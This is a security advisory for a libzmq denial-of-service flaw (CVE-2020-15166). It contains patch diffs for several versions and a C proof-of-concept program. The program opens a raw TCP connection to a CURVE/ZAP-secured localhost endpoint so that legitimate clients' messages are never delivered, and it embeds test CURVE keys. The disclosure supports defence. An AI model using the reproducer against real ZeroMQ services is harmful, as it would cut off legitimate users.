     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -296,9 +298,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -840,6 +845,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index b5163191..618d4cf0 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ namespace zmq
         };
 
         stream_engine_t (fd_t fd_, const options_t &options_,
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -176,6 +178,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index eb365e5e..e81b8943 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -150,7 +150,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 0863916b..d27dfcd1 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -104,7 +104,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 92f35fec..052b14a5 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::tipc_connecter_t::out_event ()
         return;
     }
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 088346d7..90438892 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -91,7 +91,7 @@ void zmq::tipc_listener_t::in_event ()
     }
 
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 94900626..042f15d7 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -23,6 +23,8 @@ namespace zmq
 
             int init (address_t *address_, bool send_, bool recv_);
 
+            bool has_handshake_stage () { return false; };
+
             //  i_engine interface implementation.
             //  Plug the engine to the session.
             void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.1.4
diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 7a61e8e9..09eb0ec8 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -41,6 +41,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicate if the engine has an handshake stage.
+        //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 34abb568..fbe53c6e 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 5c2a028f..9c973971 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -102,7 +102,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 72542e19..04d3e3a7 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -26,6 +26,8 @@ namespace zmq
             // create NORM instance, session, etc
             int init(const char* network_, bool send, bool recv);
             void shutdown();
+
+            bool has_handshake_stage () { return false; };
             
             //  i_engine interface implementation.
             //  Plug the engine to the session.
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 4594ab46..dadace5f 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -64,6 +64,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index bed05f75..c83e28ed 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -63,6 +63,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 86bfd8ff..332f756c 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -256,7 +256,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -352,7 +353,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -381,11 +393,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 8730c271..ff4a899b 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -67,6 +67,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void engine_error (zmq::stream_engine_t::error_reason_t reason);
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index a3b70436..a4c764c3 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
 
                 //  Create the engine object for this connection.
                 stream_engine_t *engine = new (std::nothrow)
-                    stream_engine_t (s, options, endpoint);
+                    stream_engine_t (s, options, endpoint, !options.raw_sock);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index faca8929..507421e9 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -72,7 +72,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     inpos (NULL),
     insize (0),
@@ -85,6 +86,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -272,9 +274,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -791,6 +796,9 @@ void zmq::stream_engine_t::zap_msg_available ()
 
 void zmq::stream_engine_t::mechanism_ready ()
 {
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index d42c6929..ea8f809a 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ namespace zmq
         };
 
         stream_engine_t (fd_t fd_, const options_t &options_,
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage_);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -172,6 +174,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index fdbc45c2..311d0d8a 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -139,7 +139,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 05171b35..83321d6e 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -106,7 +106,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 11b53c50..4c6f7b17 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -121,7 +121,7 @@ void zmq::tipc_connecter_t::out_event ()
         return;
     }
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index fb8df6c3..7003630d 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -89,7 +89,7 @@ void zmq::tipc_listener_t::in_event ()
     }
 
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
4.0.5
diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 39266c41..cd22ea48 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -31,6 +31,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicate if the engine has an handshake stage.
+        //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 239d2be9..64cf571d 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -113,7 +113,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index b102da6d..f7f1542a 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -81,7 +81,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 1f5d2d4e..5eabf7f2 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -54,6 +54,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index 045cd474..00d8ffbe 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -53,6 +53,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 537dcb3e..4f877768 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -238,7 +238,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -326,7 +327,18 @@ int zmq::session_base_t::zap_connect ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
+
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
 
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -355,11 +367,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::detach ()
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 2ef7dc50..94cadc89 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -56,6 +56,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void detach ();
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 4d252d89..e883af98 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -53,7 +53,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_, 
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     inpos (NULL),
     insize (0),
@@ -65,6 +66,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -191,9 +193,12 @@ void zmq::stream_engine_t::in_event ()
     assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -651,6 +656,9 @@ void zmq::stream_engine_t::zap_msg_available ()
 
 void zmq::stream_engine_t::mechanism_ready ()
 {
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index 631d1cbb..4465e57c 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -53,10 +53,12 @@ namespace zmq
     public:
 
         stream_engine_t (fd_t fd_, const options_t &options_, 
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage_);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -156,6 +158,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index 9e87a71d..69c95109 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -126,7 +126,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 89e146b6..6ab40ed2 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -92,7 +92,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/tests/testutil.hpp b/tests/testutil.hpp
index 7a42379d..e8744aee 100644
--- a/tests/testutil.hpp
+++ b/tests/testutil.hpp
@@ -140,8 +140,12 @@ expect_bounce_fail (void *server, void *client)
 
     //  Send message from server to client to test other direction
     rc = zmq_send (server, content, 32, ZMQ_SNDMORE);
+    if (rc == -1 && zmq_errno () == EAGAIN)
+        return;
     assert (rc == 32);
     rc = zmq_send (server, content, 32, 0);
+    if (rc == -1 && zmq_errno () == EAGAIN)
+        return;
     assert (rc == 32);
 
     //  Receive message at client side (should not succeed)

Workarounds

No workarounds known

References

Found thanks to Google's oss-fuzz project:
https://oss-fuzz.com/testcase-detail/5707174518194176

For more information

If a raw TCP socket is opened and connected to an endpoint that is fully configured with CURVE/ZAP, legitimate clients will not be able to exchange any message. Handshakes complete successfully, and messages are delivered to the library, but the server application never receives them.

To reproduce simply run this test program - if the library is affected, it will deadlock and never terminate:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <assert.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <zmq.h>

static void zap_handler(void *ctx)
{
    int rc;

    void *handler = zmq_socket(ctx, ZMQ_REP);
    assert(handler);
    rc = zmq_bind(handler, "inproc://zeromq.zap.01");
    assert(rc == 0);

    while (true) {
        char buf[64], sequence[256];

        // version
        rc = zmq_recv(handler, buf, 256, 0);
        if (rc < 0)
            break;
        // sequence
        rc = zmq_recv(handler, sequence, 256, 0);
        assert (rc > 0);
        sequence[rc] = '\0';
        // domain
        rc = zmq_recv(handler, buf, 256, 0);
        assert (rc > 0);
        // address
        rc = zmq_recv(handler, buf, 256, 0);
        assert (rc > 0);
        // routing_id
        rc = zmq_recv(handler, buf, 256, 0);
        assert (rc >= 0);
        // mechanism
        rc = zmq_recv(handler, buf, 256, 0);
        assert (rc > 0);
        // key
        rc = zmq_recv(handler, buf, 256, 0);
        assert (rc > 0);
        rc = zmq_send(handler, "1.0", 3, ZMQ_SNDMORE);
        assert(rc == 3);
        rc = zmq_send(handler, sequence, strlen(sequence), ZMQ_SNDMORE);
        assert(rc == strlen(sequence));
        rc = zmq_send(handler, "200", 3, ZMQ_SNDMORE);
        assert(rc == 3);
        rc = zmq_send(handler, "OK", 2, ZMQ_SNDMORE);
        assert(rc == 2);
        rc = zmq_send(handler, "anonymous", 9, ZMQ_SNDMORE);
        assert(rc == 9);
        rc = zmq_send(handler, "", 0, 0);
        assert(rc == 0);
    }

    zmq_unbind(handler, "inproc://zeromq.zap.01");
    zmq_close(handler);
}

int main (int argc, char **argv)
{
    const char *client_public = "{{k*81)yMWEF{/BxdMd[5RL^qRFxBgoL<8m.D^KD";
    const char *client_secret = "N?Gmik8R[2ACw{b7*[-$S6[4}aO#?DB?#=<OQPc7";
    const char *server_public = "3.9-xXwy{g*w72TP*3iB9IJJRxlBH<ufTAvPd2>C";
    const char *server_secret = "T}t5GLq%&Qm1)y3ywu-}pY3KEA//{^Ut!M1ut+B4";
    char buf[256];
    int rc;

    void *ctx = zmq_ctx_new();
    assert(ctx);

    void *zap_thread = zmq_threadstart (zap_handler, ctx);
    assert(zap_thread);

    void *server = zmq_socket(ctx, ZMQ_DEALER);
    assert(server);
    int as_server = 1;
    rc = zmq_setsockopt (server, ZMQ_CURVE_SERVER, &as_server, sizeof (int));
    assert (rc == 0);
    rc = zmq_setsockopt (server, ZMQ_CURVE_SECRETKEY, server_secret, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (server, ZMQ_ZAP_DOMAIN, "ZAP", 3);
    assert (rc == 0);
    rc = zmq_bind(server, "tcp://127.0.0.1:54321");
    assert (rc == 0);

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(54321);
    rc = inet_aton("127.0.0.1", &addr.sin_addr);
    assert (rc != 0);
    int client_bad = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    assert(client_bad > 0);
    rc = connect(client_bad, (struct sockaddr *)&addr, sizeof(addr));
    assert (rc == 0);

    void *client_good = zmq_socket(ctx, ZMQ_DEALER);
    assert(client_good);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_SERVERKEY, server_public, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_PUBLICKEY, client_public, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_SECRETKEY, client_secret, 41);
    assert (rc == 0);
    rc = zmq_connect(client_good, "tcp://127.0.0.1:54321");
    assert (rc == 0);

    rc = zmq_send(client_good, "ABC", 3, ZMQ_SNDMORE);
    assert (rc == 3);
    rc = zmq_send(client_good, "DEF", 3, 0);
    assert (rc == 3);
    rc = zmq_recv(server, buf, 256, 0);
    assert (rc == 3);
    rc = memcmp(buf, "ABC", 3);
    assert (rc == 0);
    rc = zmq_recv(server, buf, 256, ZMQ_DONTWAIT);
    assert (rc == 3);
    rc = memcmp(buf, "DEF", 3);
    assert (rc == 0);
    rc = zmq_send(server, "ABC", 3, ZMQ_SNDMORE);
    assert (rc == 3);
    rc = zmq_send(server, "DEF", 3, 0);
    assert (rc == 3);
    rc = zmq_recv(client_good, buf, 256, 0);
    assert (rc == 3);
    rc = memcmp(buf, "ABC", 3);
    assert (rc == 0);
    rc = zmq_recv(client_good, buf, 256, ZMQ_DONTWAIT);
    assert (rc == 3);
    rc = memcmp(buf, "DEF", 3);
    assert (rc == 0);

    close(client_bad);
    zmq_close(client_good);
    zmq_close(server);
    zmq_ctx_term(ctx);

    return 0;
}

Severity

High

CVE ID

CVE-2020-15166

Weaknesses

No CWEs